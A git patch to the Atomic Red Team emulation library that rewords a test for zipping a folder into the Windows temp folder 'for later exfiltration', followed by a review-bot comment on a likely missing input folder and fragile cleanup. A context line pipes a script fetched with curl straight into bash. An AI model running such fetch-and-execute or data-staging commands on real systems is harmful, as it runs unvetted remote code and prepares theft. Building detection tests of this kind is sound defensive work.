From b2d25ea9bcebd30ec1891c8c33b9c16cb011bf39 Mon Sep 17 00:00:00 2001
From: JB <35406993+cherokeejb@users.noreply.github.com>
Date: Mon, 6 Jan 2020 15:02:07 -0600
Subject: [PATCH] Updated atomic test 3 for better alignment with T1074 (Staging) (#763)

Test was written previously for T1022 and then moved here; T1022 already has very similar tests, but it is useful here so just reworded test 3.
---
 atomics/T1074/T1074.yaml | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/atomics/T1074/T1074.yaml b/atomics/T1074/T1074.yaml
index c666c8bc..5acd87ee 100644
--- a/atomics/T1074/T1074.yaml
+++ b/atomics/T1074/T1074.yaml
@@ -29,15 +29,15 @@ atomic_tests:
     command: |
       curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.sh | bash -s > /tmp/discovery.log
 
-- name: Zip a Folder with PowerShell
+- name: Zip a Folder with PowerShell for Staging in Temp
   description: |
-    use living off the land tools to encrypt and zip a file for exfiltration
+    Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration.
   supported_platforms:
   - windows
   executor:
     name: powershell
     elevation_required: false
     command: |
-      Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_encrypt -DestinationPath $env:TEMP\Folder_to_encrypt.zip
+      Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_zip -DestinationPath $env:TEMP\Folder_to_zip.zip
   cleanup_command: |
-    Remove-Item -Path $env:TEMP\Folder_to_encrypt.zip
+    Remove-Item -Path $env:TEMP\Folder_to_zip.zip
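Review bot: The new command reads `$PathToAtomicsFolder\T1074\bin\Folder_to_zip`, but the diffstat shows only T1074.yaml changing, so unless the `bin\Folder_to_encrypt` directory was renamed in a separate change, Compress-Archive will fail to find its input and the test will not run. The new cleanup line `Remove-Item -Path $env:TEMP\Folder_to_zip.zip` still throws when the archive is absent, for example after a failed run; `Remove-Item -Path $env:TEMP\Folder_to_zip.zip -ErrorAction Ignore` makes cleanup idempotent. The rewritten description says "zip a file" while the command archives a folder; `zip a folder` would match the test name and the command.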